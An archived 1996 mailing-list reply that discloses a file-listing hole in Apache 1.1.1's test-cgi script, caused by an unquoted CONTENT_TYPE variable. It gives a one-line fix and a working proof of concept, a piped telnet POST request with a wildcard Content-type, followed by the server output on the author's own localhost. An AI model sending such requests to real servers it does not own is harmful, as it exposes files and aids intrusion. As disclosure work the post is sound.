Re: Vulnerability in test-cgi

[im14u2c () cegt201 bradley edu (Joe Zbiciak)]

And then Ed Arnold went and said something like this:

|
|Another data point for anyone out there running Apache ... test-cgi
|in the apache-1.1.1 distribution already has the required
|
|echo QUERY_STRING = "$QUERY_STRING"
|

However, it does not have the necessary quotes around the "$CONTENT_TYPE"
string.  Therefore it's still vulnerable in it's default configuration.
Adding "set -f" as the second line of the script closes the hole completely.

(www) frankenstein:~$ (echo POST /cgi-bin/test-cgi HTTP/1.0; echo Content-type: \* ; echo Content-length: 0; echo; 
sleep 5) | telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
HTTP/1.0 200 OK
Date: Wed, 04 Dec 1996 04:11:15 GMT
Server: Apache/1.1.1
Content-type: text/plain

CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = Apache/1.1.1
SERVER_NAME = frankenstein.asylum.net
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = POST
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING =
REMOTE_HOST = localhost
REMOTE_ADDR = 127.0.0.1
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE = (bunch of files listed here, whose names I don't care to share)
CONTENT_LENGTH = 0
Connection closed by foreign host.
(www) frankenstein:~$
--
:======= Joe Zbiciak =======:      Bonehead Quotes of 1992 (5 of 14)
:- - im14u2c () bradley edu - -:"Until recently the word facist was considered
: - - - - - http: - - - - - : shameful. Fortunately that time has passed.
://ee1.bradley.edu/~im14u2c/: In fact, there is now a reassessment of how
:======= DISCLAIMER: =======: much Grandpa Benito did for Italy."
:   It's all right... -  - -- -- Alessandra Mussolini, announcing her plan
-- -  -   I didn't do it!   :    to run for parliament as a neofascist
(462:834 11:15)